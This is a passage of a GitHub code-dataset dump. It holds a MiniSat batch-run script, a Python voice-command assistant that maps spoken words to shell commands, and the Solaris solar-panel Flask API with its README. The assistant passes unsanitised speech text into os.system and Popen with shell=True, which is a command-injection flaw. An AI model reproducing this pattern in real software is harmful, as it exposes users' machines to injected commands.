index_col=0)\ndt_F = dt.loc[:, dt.columns.str.contains('M\\d',regex=True) == False]\ndt_F.to_csv('expose_F_genusProfileTable.xls', sep=\"\\t\")\ndt_M = dt.loc[:, dt.columns.str.contains('M\\d',regex=True)]\ndt_M.to_csv('expose_M_genusProfileTable.xls', sep=\"\\t\")\n"
}
] | 90 |
lilac/minisat | https://github.com/lilac/minisat | 16889b5e7b59e720ac5c12c345ade5c667ecc78a | 46614a9c0e98ad2bf4c859c1ef97aa79ed08849a | fb34b3a53cc5f438eebc220cb364e0e6f8bdd7e9 | refs/heads/master | 2020-12-25T04:38:48.521474 | 2012-04-30T01:56:58 | 2012-04-30T01:56:58 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.544708788394928,
"alphanum_fraction": 0.5499042868614197,
"avg_line_length": 39.17582321166992,
"blob_id": "dda965eb7d1d07f59f66033b51f62abe4a0d63c1",
"content_id": "ecf7457a8488a5fb6402bf485b09017ebdc2b48c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3657,
"license_type": "permissive",
"max_line_length": 306,
"num_lines": 91,
"path": "/run-solver.py",
"repo_name": "lilac/minisat",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python2\n\nimport sys\n\ndef usage():\n print 'usage: solver directory'\n print 'options: -h, -e extension, -p prefix_name, -t timeout, -m memout, -f (force log removal) -n'\n\nif len( sys.argv ) < 2 :\n usage()\n sys.exit(0)\n\nimport os, glob, getopt, shutil\n\nextension = '.cnf'\njob_name_prefix = ''\ntimeout = '1800'\nmemout = '4G'\nremovedir = False\nresources = ' -V '#-pe smp 4 '\n#resources = ' -V -pe smp 4 '\ngrow = None\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"he:p:t:m:f:g:\", [\"help\", \"extension\", \"prefix\", \"timeout\", \"memout\", \"force\", \"grow\"])\nexcept getopt.GetoptError, err:\n print str(err) # will print something like \"option -a not recognized\"\n usage()\n sys.exit(2)\nfor o, a in opts:\n if o in (\"-e\", \"--extension\"):\n extension = a\n elif o in (\"-p\", \"--prefix\"):\n job_name_prefix = a\n elif o in (\"-t\", \"--timeout\"):\n timeout = a\n elif o in ( \"-m\", \"--memout\" ):\n memout = a\n elif o in (\"-f\", \"--force\"):\n removedir = True\n elif o in (\"-g\", \"--grow\"):\n grow = a\n elif o in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n else:\n assert False, \"unhandled option\"\n\nsolver = os.path.abspath( args[0] )\ndirectory = os.path.expanduser( args[1] )\nif not directory.endswith('/'):\n directory += '/'\nlog_dir = os.path.expanduser( os.getcwd() + '/log/' ) + job_name_prefix + os.path.basename( solver ) + '.' + directory.split('/')[-2]\n\nif grow is not None:\n solver += ' -grow=' + grow\n log_dir += '.' + grow\nprint 'Current parameters:\\n' + 'Solver: ' + solver + \"\\nDirectori: \" + directory + \"\\nExtension: \" + extension + \"\\nJob Prefix: \" + job_name_prefix + \"\\nLog dir: \" + log_dir + \"\\nMemory out: \" + memout + \"\\nTime out: \" + timeout\n\nif removedir :\n shutil.rmtree( log_dir )\n\n#if os.path.isdir( log_dir ):\n# print 'Error: Log directory already exists'\n# print 'It can be removed it with: rm -R ' + log_dir\n# sys.exit(0)\n\nfiles = glob.glob( directory + \"/*\" + extension )\nif len( files ) == 0:\n print 'Error: no files'\n sys.exit(0)\n\nif not os.path.isdir (log_dir):\n os.makedirs( log_dir )\n \nfor file in glob.glob( directory + \"/*\" + extension ):\n file_basename = os.path.basename( file )\n log = log_dir + '/' + file_basename + '.log'\n cmd = ('timelimit -p -s 2 -t ' + timeout + ' ' + solver + ' ' + file + '>' + log)\n print(cmd + '\\n')\n #import pdb; pdb.set_trace()\n if not os.path.exists(log):\n print('log file not exist.\\n')\n os.system(cmd)\n #print ('echo /usr/bin/time -p ' + solver + ' ' + file + ' | qsub ' + resources + ' -cwd -o ' + log_dir + '/' + file_basename + '.log -j y -n ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #break\n #os.system('echo /usr/bin/time -p ' + solver + ' ' + file + ' | qsub ' + resources + ' -cwd -o ' + log_dir + '/' + file_basename + '.log -j y -n ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #os.system('echo /usr/bin/time -p ' + solver + ' ' + file + \" | qsub \" + resources + \" -l h_cpu=\" + timeout + \" -l h_vmem=\" + memout + \" -l mem=\" + memout + \" -o \" + log_dir + '/' + file_basename + '.log -j y -N ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #cmd = ('echo /usr/bin/time -p ' + solver + ' ' + file + \" | qsub \" + resources + \" -l cput=\" + timeout + \" -l vmem=\" + memout + \" -l mem=\" + memout + \" -o \" + log_dir + '/' + file_basename + '.log -j oe -N ' + job_name_prefix + os.path.basename( solver ) + '.' + file_basename + ' > /dev/null ')\n #print cmd\n #os.system(cmd)\n\n"
},
{
"alpha_fraction": 0.4577181339263916,
"alphanum_fraction": 0.4684563875198364,
"avg_line_length": 21.923076629638672,
"blob_id": "17cf4e40f67050fab83a99d97cb59cc7a9639a10",
"content_id": "dfaa020d56b6ebebcc9af24f4072ef9dd292936d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1490,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 65,
"path": "/get-stats.py",
"repo_name": "lilac/minisat",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport re\n\nexps = [\n ('nVar', 'Number of variables:\\\\s*(\\\\d+)'),\n ('nCls', r'Number of clauses:\\s*(\\d+)'),\n ('time', r'CPU time\\s*:\\s*(?P<time>[\\d|\\.]+)')\n ]\n\nREs = [(n, re.compile(e)) for (n, e) in exps]\n\ndef parse(fn):\n res = {}\n with open(fn, 'r') as log:\n for line in log:\n for (n, re) in REs:\n m = re.search(line)\n if m:\n res[n] = m.group(1)\n res['ans'] = line.strip()\n return res\n\ndef sort_dict(a):\n return sorted(a.items(), key = lambda x: x[0])\n\ndef print_stat(info, stat):\n print('*** ' + info + ' ***')\n import pprint\n #pp = pprint.PrettyPrinter(indent=4)\n \n pprint.pprint(stat)\n print('\\n')\n\ndirs = ['jarvisalo', 'UUF250']\ngrows = ['0', '100', '1000']\n\nimport sys\nimport os, glob\n\nstats = {}\ncmp = {}\nfor d in dirs:\n cmp[d] = {}\n stats[d] = {}\n for g in grows:\n ext = '' if g == '0' else '.' + g\n dir = 'log/minisat.' + d + ext\n \n stats[d][g] = {}\n \n for file in glob.glob(dir + \"/*.log\"):\n basename = os.path.basename(file)\n stats[d][g][basename] = parse(file)\n\n if basename not in cmp[d].keys():\n cmp[d][basename] = {}\n cmp[d][basename][g] = stats[d][g][basename]['time']\n\n #stat = sort_dict(stats[d][g])\n #print_stat(dir, stat)\n\n print_stat(d, cmp[d])\n\n#print (stats)\n#print (parse(sys.argv[1]))\n"
}
] | 2 |
mateus-n00b/projeto_alfred | https://github.com/mateus-n00b/projeto_alfred | 3fe9546bbdfb70f144dc826f99bf47029172bdfc | 6da96bccd2e681903217b21109a509c1bc633d77 | 0192bf4ff1019a6133e8b99babf5799c8508bbbb | refs/heads/master | 2021-01-12T07:09:20.909710 | 2017-02-19T23:03:23 | 2017-02-19T23:03:23 | 76,919,538 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5367187261581421,
"alphanum_fraction": 0.5531250238418579,
"avg_line_length": 24.098039627075195,
"blob_id": "15d3d7387bd40a87c55a591380fe29904e7f7ead",
"content_id": "99b86ea95188b7107b3d232a28421fb0fdfb97bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1280,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 51,
"path": "/fala.py",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding: UTF-8\n\n\nimport pyttsx,os\nimport speech_recognition as sr\nimport time,sys\n\nengine = pyttsx.init()\n# GAMBIS\nhour = time.asctime().split(' ')[3].split(':')[0]\n\ndef speak(text):\n engine.say(text)\n engine.runAndWait()\n\nif int(hour) < 12:\n speak('Good morning, Mr. '+os.getenv(\"USER\"))\nelif int(hour) >= 12 and int(hour) < 18:\n speak('Good aftermoon, Mr. '+os.getenv(\"USER\"))\nelif int(hour) >= 18 and int(hour) < 23 :\n speak('Good night, Mr. '+os.getenv(\"USER\"))\n\ndef readABook(book):\n fala = pyttsx.init()\n a = open(book, 'r')\n for x in a.readlines():\n fala.say(x)\n time.sleep(0.3)\n sys.exit()\n\ndef checkSystem():\n fala = pyttsx.init()\n # os.system('bash check.sh')\n try:\n a = open(\"/tmp/outLogs\", 'r')\n for x in a.readlines():\n fala.say(x)\n time.sleep(0.3)\n # sys.exit()\n engine.runAndWait() \n except:\n speak(\"Arggg, something goes wrong!\")\n\ndef addCommand(cmd):\n # Ugly command to add commands\n # os.system('sed -i \"s/#,/,\\'%s\\':\\'%s\\'\\\\n#,/\" commands.py' % (cmd.split(':')[0],cmd.split(':')[1]))\n os.system('sed -i \"s/#,/,\\'%s\\':\\'%s\\'\\\\n#,/\" commands.py' % (cmd[0],cmd[1]))\n\n# readABook(\"/tmp/outLogs\")\ncheckSystem()\n"
},
{
"alpha_fraction": 0.47020724415779114,
"alphanum_fraction": 0.48704662919044495,
"avg_line_length": 23.125,
"blob_id": "f868088e5f797577ce3b6b7b2d477882dbfc2a6d",
"content_id": "41d6afaea59faa1f652e43878f3968c3c3e6ca8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 32,
"path": "/commands.py",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#coding: UTF-8\n# Commands for the alfred.py program\n# Do not remove the 'hashtag,' signal\n#\n# Mateus-n00b, Dezembro 2016\n#\n# Version 1.0\n# Licence GPL\n# -==============================================\nclass Commands():\n \"\"\"Here you'll put a list of your commands.\"\"\"\n def __init__(self):\n self = None\n def getCommand(self):\n # Add your commands in the dict\n # {howToCallIt:command}\n return {'firefox': 'firefox &',\n 'music':'totem &',\n\t\t 'metallica':'totem ~/Música/Metallica\\ \\(Black\\ Album\\)\\ -\\ 1991/ &'\n ,'clear':'clear',\n 'code':'atom',\n 'memory':'df -h'\n,'cd':'cd'\n#,\n }\n\n\n\n# Debug\n# a = Commands()\n# dic = a.getCommand()\n# print dic['firefox']\n"
},
{
"alpha_fraction": 0.47164949774742126,
"alphanum_fraction": 0.4974226951599121,
"avg_line_length": 24.866666793823242,
"blob_id": "097cf531e7bf986db5ac783bc559784c95c74332",
"content_id": "e542517cd4e960a155cf21108e7f5924f6b35d27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 15,
"path": "/check.sh",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# script para a verificacao de uso de memoria pelos diretorios\n#\n# Mateus-n00b, Dezembro 2016\n#\n# Versao 1.0\n#\n# Licensa GPL\n# -===================================================================================== -\nrm /tmp/outLogs 2> /dev/null\n\nfor x in \"$HOME/\"*\ndo\n echo \"Total memory usage of $(basename \"$x\") is at $(du -sh \"$x\"| awk '{print $1}')\" >> /tmp/outLogs\ndone\n"
},
{
"alpha_fraction": 0.5528942346572876,
"alphanum_fraction": 0.5584830045700073,
"avg_line_length": 27.146066665649414,
"blob_id": "9c81c3e69e4be086e9a23d526be1da536f8042ac",
"content_id": "a3047cc62e751a220fae390d664feaa5a2a80ff8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2505,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 89,
"path": "/alfred.py",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# Simples script para execucao de comandos de voz\n# O codigo foi baseado no exemplo presente em\n# https://pythonspot.com/en/speech-recognition-using-google-speech-api/\n#\n# Mateus-n00b, Dezembro 2016\n#\n# Versao 1.0\n#\n# Licensa GPL\n# -================================================================-\n\nimport speech_recognition as sr\nimport pyttsx,os\nfrom subprocess import Popen, PIPE\nimport commands,time\nimport pyaudio\n\n\n# To speak\nengine = pyttsx.init()\n# Record Audio\nr = sr.Recognizer()\n# Audio var\nglobal audio\n\n# +==============================+\n# FUNCTIONS\n# +==============================+\ndef speak(text):\n engine.say(text)\n engine.runAndWait()\n\ndef addCommand(cmd):\n os.system('sed -i \"s/#,/,\\'%s\\':\\'%s\\'\\\\n#,/\" commands.py' % (cmd[0],cmd[1]))\n\ndef listen():\n with sr.Microphone() as source:\n speak(\"I'm ready to help you\")\n print \"I'm ready to help you\"\n audio = r.listen(source)\n return str(r.recognize_google(audio)).lower()\n# +==============================+\n# MAIN\n# +==============================+\ntry:\n with sr.Microphone() as source:\n speak(\"What do you need sir?\")\n print \"What do you need sir?\"\n audio = r.listen(source)\n\nexcept Exception as e:\n speak(\"Arggg, something goes wrong!\")\n raise e\n\n# Speech recognition using Google Speech Recognition\ntry:\n # Get the commands from the commands.py\n cmds = commands.Commands().getCommand()\n for x in cmds.keys():\n if x in str(r.recognize_google(audio)).lower():\n os.system(cmds[x])\n speak(\"Executing %s\" % (x))\n break\n\n elif 'addiction' in str(r.recognize_google(audio)).lower():\n print (\"What is the nick of the command?\")\n nick = listen()\n print (\"What is the command?\")\n cmd = listen()\n\n tp = (nick,cmd)\n addCommand(tp)\n\n elif 'search' in str(r.recognize_google(audio)).lower():\n search = listen()\n cmd = Popen([\"bash engine.sh {0}\".format(search)], stdout=PIPE, shell=True)\n saida, erro = cmd.communicate()\n speak(\"Showing the results\")\n print saida,erro\n\n else:\n print (\"You said \"+r.recognize_google(audio))\n\nexcept sr.UnknownValueError:\n print (\"What do you said?\")\nexcept sr.RequestError as e:\n print \"Could not request results from Google Speech Recognition service; {0}\".format(e)\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.7770780920982361,
"alphanum_fraction": 0.7808564305305481,
"avg_line_length": 33.4782600402832,
"blob_id": "6d1a468277fe74c521cf23fa92f9c6dca31f4b3a",
"content_id": "6f97ebab3a7223ccd37c35ece2e2f275db29114e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 23,
"path": "/README.md",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "# projeto_alfred\nEste programa utiliza a API da Google (Google Speech API) para reconhecimento de voz. \nEsta API permite transformar comandos de voz em strings, que por sua vez podem ser comandos\na serem executados na sua maquina. \n\n## Dependencias\nPara instalar a API acesse:\nhttps://pythonspot.com/en/speech-recognition-using-google-speech-api/\n\nO PyAudio deve ser instalado da seguinte forma:\n**sudo apt-get install python3-pyaudio**\n\nPara instalar o pyttsx (para a fala) execute o comando:\n**sudo pip install pyttsx**\n\n## Testado nas distribuilcoes\n**Debian Jessie**\n\n## Como usar\nNo arquivo commands.py estao localizados os comandos que o usuario deve definir. \nEstao organizados da seguinte forma {NickDoComando:Comando}. \n\nSinta-se livre para elogiar, contribuir ou criticar. n00b º_º. \n"
},
{
"alpha_fraction": 0.5419355034828186,
"alphanum_fraction": 0.5612903237342834,
"avg_line_length": 24.83333396911621,
"blob_id": "b5e1d12bc62bd35bf2d224fa5689e5cf97927943",
"content_id": "46ae87990118e6fbde4252dabcac67fe72836342",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 155,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 6,
"path": "/engine.sh",
"repo_name": "mateus-n00b/projeto_alfred",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n[ $# -lt 1 ] && exit\necho \"Found items\"\nlocate \"$1\" | while read res; do\n echo \"$res is from type $(file $res | awk -F: '{print $2}')\"\ndone\n"
}
] | 6 |
SalmanSayeed79/solaris-backend | https://github.com/SalmanSayeed79/solaris-backend | 322b327ead9a1b0d7b7b9448f3ba548e873c7ace | a86144206fa01ad9844e9904585fdfd717a73588 | e6edc9dde683cd483e49803bcb05b07241e98b6d | refs/heads/master | 2023-08-04T01:58:05.549647 | 2021-10-02T10:27:08 | 2021-10-02T10:27:08 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7474324703216553,
"alphanum_fraction": 0.7577025294303894,
"avg_line_length": 56.130435943603516,
"blob_id": "23cbaf1ee303cc04de15d230d1096d5f9266d87c",
"content_id": "ed76b03843e2e38bb4800d1c4111c172c6539192",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2629,
"license_type": "no_license",
"max_line_length": 277,
"num_lines": 46,
"path": "/README.md",
"repo_name": "SalmanSayeed79/solaris-backend",
"src_encoding": "UTF-8",
"text": "\n# Solaris Backend\n[](https://postimg.cc/QKGHpX5B)\nThe core of the \"Solaris\" web app and the mobile app is its backend REST API. This is where the fetching of data occurs. And our calculation for optimal tilt angle is also done here\n\nYou can view are web app [here](https://solaris-bd.web.app/)\n\n\n### Challenges\n---\nWhile building the web app for \"Solaris\", we encountered two huge problems : \n - #### CORS error while fetching data\n\t Fetching data directly from POWER API causes CORS(Cross Origin Resource Sharing) error. This is error is resolved in our backend using the CORS module for flask\n - #### Calculation of the optimal tilt angle\n\t One of the key features of \"Solaris\" is to provide the optimal tilt angle for solar panels. All the calculations for that are done in our backend.\n\n### Dependencies\n---\nWe have used a few modules to build up our backend REST API. They are listed below:\n1. Python Flask\n2. flask_cors from CORS\n3. json module\n4. requests module\n5. math module\n6. requests module\n### Endpoints\n---\nThere are basically 3 basic endpoints of this REST API \n\n1. ```/api/temporal/daily/optimum```\n\tThis endpoint returns the estimated power output, optimal tilt angle, optimal power output etc. This is a part of our unique API which makes use of our exquisite algorithm to calculate the optimal tilt angle and returns it to the client\n2. ```/api/temporal/monthly/point/params``` \n\tThis endpoint return the monthly data of a certain location at a certain time. This actually fetches data from NASA POWER API and routes it back to the client\n3. ```/api/temporal/daily/point```\n\tThis endpoint deals with the daily data of a particular location at a particular day. The param list contains all the information about latitude, longitude, starting date, ending date, return type. This endpoint also fetches data from NASA POWER API and feeds it to the client\n### Resources\n---\n* Solaris web app : [Solaris web homepage](https://solaris-bd.web.app/)\n* Solaris web app repo : [Github repo for Solaris web app](https://github.com/SalmanSayeed79/Solaris-BD)\n* Solaris Mobile app : [Apk drive link](https://drive.google.com/file/d/170HMrigXFpZwzHW3F4FIAJt-gC9HfU5Z/view?usp=sharing)\n* Solaris Mobile app repo: [Github repo for solaris mobile app](https://github.com/zarifikram/SOLARIS)\n* Solaris IOT module : [Github repo for Solaris IOT code](https://github.com/pptx704/solaris-servo-control)\n\n### Reference\n---\nNASA POWER API Homepage : [NASA POWER API](https://power.larc.nasa.gov/)\nPython Flask : [Flask Website](https://flask.palletsprojects.com/en/2.0.x/)\n"
},
{
"alpha_fraction": 0.6761869192123413,
"alphanum_fraction": 0.6928783655166626,
"avg_line_length": 38.661766052246094,
"blob_id": "e7a7d6d5b2d875dd848d72f13b5f5d0f6a0168db",
"content_id": "5e43d94a0657acb3c94705f56b37720014a15045",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2696,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 68,
"path": "/plan.py",
"repo_name": "SalmanSayeed79/solaris-backend",
"src_encoding": "UTF-8",
"text": "#AKA elevation angle\nimport json\nimport requests\nfrom math import sin, cos, exp\nfrom datetime import datetime\ndef get_api(longitude, latitude):\n now = datetime.now()\n timeline = f\"{now.year-1}{now.month}{now.day}\"\n parameters = {\n 'parameters': \"ALLSKY_SFC_SW_DWN,CLRSKY_SFC_SW_DWN,ALLSKY_KT\",\n 'community': \"RE\",\n 'longitude': longitude,\n 'latitude': latitude,\n 'start': timeline,\n 'end': timeline,\n 'format': \"JSON\"\n }\n data = requests.get(\"https://power.larc.nasa.gov/api/temporal/daily/point\", params=parameters)\n return data.json()\n\ndef get_location(data):\n longitude = data['geometry']['coordinates'][0]\n latitude = data['geometry']['coordinates'][1]\n return (latitude, longitude)\n\ndef getSolarZenithAngle(data, noOfDay = datetime.now().timetuple().tm_yday):\n latitude, longitude = get_location(data)\n declinationAngle = 23.45*sin(360*( 284 + noOfDay) / 365 )\n return 90 - latitude + declinationAngle\n\n#if this value is < 0.3 we say it's overcast\ndef getModifiedClearnessIndex(clearnessIndex, solarZenithAngle):\n return solarZenithAngle / (.1 + 1.031*exp(-1.4/(.9 + 9.4*cos(solarZenithAngle))))\n \ndef getOptimumPowerPerSqMeter(data):\n clearnessIndex = list(data[\"properties\"][\"parameter\"][\"ALLSKY_KT\"].values())[0]\n solarZenithAngle = getSolarZenithAngle(data)\n if getModifiedClearnessIndex(clearnessIndex, solarZenithAngle) < 0.3:\n return getDiffuseIrradiation(data)\n else:\n return getGlobalIrradiation(data) / sin(solarZenithAngle)\n \ndef getOptimumTiltAngle(data):\n clearnessIndex = list(data[\"properties\"][\"parameter\"][\"ALLSKY_KT\"].values())[0]\n solarZenithAngle = getSolarZenithAngle(data)\n \n if getModifiedClearnessIndex(clearnessIndex, solarZenithAngle) < 0.3:\n return 0\n else: \n return 90 - solarZenithAngle\n \ndef getDiffuseIrradiation(data):\n allsky = list(data[\"properties\"][\"parameter\"][\"ALLSKY_SFC_SW_DWN\"].values())[0]\n clrsky = list(data[\"properties\"][\"parameter\"][\"CLRSKY_SFC_SW_DWN\"].values())[0]\n return float(clrsky) - float(allsky)\n\n \ndef getGlobalIrradiation(data):\n allsky = list(data[\"properties\"][\"parameter\"][\"ALLSKY_SFC_SW_DWN\"].values())[0]\n return allsky\n \ndef getRegularPowerPerSqMeter(data):\n latitude, longitude = get_location(data)\n solarZenithAngle = getSolarZenithAngle(data)\n return abs((getGlobalIrradiation(data) - getDiffuseIrradiation(data)) * sin(latitude + solarZenithAngle) / sin(solarZenithAngle))\n \ndef getPercentProfit(data):\n return (getOptimumPowerPerSqMeter(data) - abs(getRegularPowerPerSqMeter(data))) * 100 / abs(getRegularPowerPerSqMeter(data))"
},
{
"alpha_fraction": 0.6502347588539124,
"alphanum_fraction": 0.6502347588539124,
"avg_line_length": 29,
"blob_id": "c68d8436de9b2fdbe3e2b6bd7438967b25cc87aa",
"content_id": "60a402f6be85a81e659b5e221c7b0eb426a4eeec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2130,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 71,
"path": "/app.py",
"repo_name": "SalmanSayeed79/solaris-backend",
"src_encoding": "UTF-8",
"text": "import json\nfrom plan import (\n get_api, \n getOptimumTiltAngle, \n getOptimumPowerPerSqMeter, \n getRegularPowerPerSqMeter, \n getPercentProfit\n)\nimport requests\nfrom flask import Flask, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\[email protected]('/api/temporal/monthly/point')\ndef monthly():\n parameters = request.args.get('parameters')\n community = request.args.get('community')\n longitude = request.args.get('longitude')\n latitude = request.args.get('latitude')\n format = request.args.get('format')\n start= request.args.get('start')\n end = request.args.get('end')\n\n query = {\n 'parameters': parameters,\n 'community': community,\n 'longitude': longitude,\n 'latitude': latitude,\n 'format': format,\n 'start': start,\n 'end': end\n }\n response = requests.get(\"https://power.larc.nasa.gov/api/temporal/monthly/point\", params=query)\n return response.json()\n\[email protected]('/api/temporal/daily/point')\ndef dailyData():\n parameters = request.args.get('parameters')\n community = request.args.get('community')\n longitude = request.args.get('longitude')\n latitude = request.args.get('latitude')\n format = request.args.get('format')\n start= request.args.get('start')\n end = request.args.get('end')\n\n query = {\n 'parameters': parameters,\n 'community': community,\n 'longitude': longitude,\n 'latitude': latitude,\n 'format': format,\n 'start': start,\n 'end': end\n }\n response = requests.get(\"https://power.larc.nasa.gov/api/temporal/daily/point\", params=query)\n return response.json()\n\[email protected]('/api/temporal/daily/optimum')\ndef daily():\n longitude = request.args.get('longitude')\n latitude = request.args.get('latitude')\n data = get_api(longitude, latitude)\n api = {\n \"optimum_tilt_angle\": getOptimumTiltAngle(data),\n \"optimum_power_per_sqmeter\": getOptimumPowerPerSqMeter(data),\n \"regular_power_per_sqmeter\": getRegularPowerPerSqMeter(data),\n \"profit_percentage\": getPercentProfit(data)\n }\n return api\n"
}
] | 3 |
den200x/side_scripts | https://github.com/den200x/side_scripts | 5454393e942411087430d98fa5e6d957cf3e9801 | 6ef6b341b30449d43d1c424b25b8c42cfaa54cd9 | 2fa6c74170e0a1fc28316f3cfe0bb675d7e0db40 | refs/heads/master | 2020-03-28T14:45:16.482693 | 2018-09-12T17:51:43 | 2018-09-12T17:51:43 | 148,519,395 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.631393313407898,
"alphanum_fraction": 0.654321014881134,
"avg_line_length": 13.921052932739258,
"blob_id": "4fc52e24841f0248cc40bc649ac2afe04399c77f",
"content_id": "7da41ecd2b40f960eab26516064e0d152dc0e1da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 38,
"path": "/datetimeConverter.py",
"repo_name": "den200x/side_scripts",
"src_encoding": "UTF-8",
"text": "import datetime\nimport time\nimport threading\n\nprint('starting')\n\ndef startTime():\n return datetime.datetime.now()\ntl=[]\ndef datetimeConverter():\n startTimestring = str(startTime())\n startTimelist = startTimestring.split()\n tS = list(map(float,startTimelist[1].split(':')))\n csT= tS[0]*3600+tS[1]*60+tS[2]\n tl.append(csT)\n\n print(tl)\n print(csT)\n return\n\n\n\ndef ProcessingTime():\n datetimeConverter()\n tdc = tl[1]-tl[0]\n print(tdc)\n del tl[:]\n return\n\n\nprint(tl)\n\ndatetimeConverter()\n\ntime.sleep(3)\n\nProcessingTime()\nprint(tl)\n"
},
{
"alpha_fraction": 0.5950652956962585,
"alphanum_fraction": 0.6110304594039917,
"avg_line_length": 12.779999732971191,
"blob_id": "14125a0c8c94fbe9babebb2688389ecdb58d9b1b",
"content_id": "54e8030ee5a9a9782f23635968a068e0d6c854e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 689,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 50,
"path": "/timer_test.py",
"repo_name": "den200x/side_scripts",
"src_encoding": "UTF-8",
"text": "import see as s\nimport time\nimport datetime\n\n\nd = s.timeTool()\nprint('here we go again=====>')\n\nd.datetimeConverter()\ntime.sleep(3)\nd.ProcessingTime()\n\nprint('try again')\n\nd.datetimeConverter()\ntime.sleep(4.5)\nd.ProcessingTime()\n\nprint('Sonic Boooooooooooooooom')\n\nd.datetimeConverter()\ntime.sleep(3)\nd.ProcessingTime()\n\n'''\nprint('here we go=========>')\ny= datetime.datetime.now()\nprint(y)\nd = tdc_timer.timeTool()\ni_T = d.datetimeConverter\ni_T\ntime.sleep(1.5)\nprint('over')\np_T = d.ProcessingTime()\np_T\nprint('new task===========================================>')\n\ny\nprint(y)\ni_T\n\ndef foo():\n count = 0\n while count<5:\n time.sleep(0.2)\n count+=1\n return\n\np_T\n'''\n"
},
{
"alpha_fraction": 0.5445255637168884,
"alphanum_fraction": 0.5620437860488892,
"avg_line_length": 20.4375,
"blob_id": "11194f0208c64b26b7c3501adb68cbd727144b48",
"content_id": "609519c63a9f8582ce6bcdda18021717ca5f686f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 32,
"path": "/tdc_timer.py",
"repo_name": "den200x/side_scripts",
"src_encoding": "UTF-8",
"text": "import datetime\nimport time\n\ntl=[]\nstartTime = ''\nclass timeTool:\n def runTime(self):\n global startTime\n startTime = datetime.datetime.now()\n return\n\n def datetimeConverter(self):\n global tl\n self.runTime()\n #print(type(startTime))\n startTimestring = str(startTime)\n startTimelist = startTimestring.split()\n tS = list(map(float,startTimelist[1].split(':')))\n csT= tS[0]*3600+tS[1]*60+tS[2]\n tl.append(csT)\n\n #print(tl)\n print(csT)\n return\n\n\n def ProcessingTime(self):\n self.datetimeConverter()\n tdc = tl[1]-tl[0]\n print(tdc)\n del tl[:]\n return"
}
] | 3 |
differentkaro/Hangman-Next | https://github.com/differentkaro/Hangman-Next | 13d0199c4809c069eeba43f3961ab2283fd141b3 | 925ee0df8712dd573adb80424b06e3c2614bc85f | f9976524be7f61e38a2fb4f92b692086771ba125 | refs/heads/master | 2021-06-11T15:28:13.921343 | 2017-02-03T22:22:32 | 2017-02-03T22:22:32 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.642625093460083,
"alphanum_fraction": 0.6429499387741089,
"avg_line_length": 39.5945930480957,
"blob_id": "80ddd83cc47845a45a4053d1b0cc210236392cdf",
"content_id": "ab30066765082fe3c422122df953f3f085c7cbfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6157,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 148,
"path": "/words.py",
"repo_name": "differentkaro/Hangman-Next",
"src_encoding": "UTF-8",
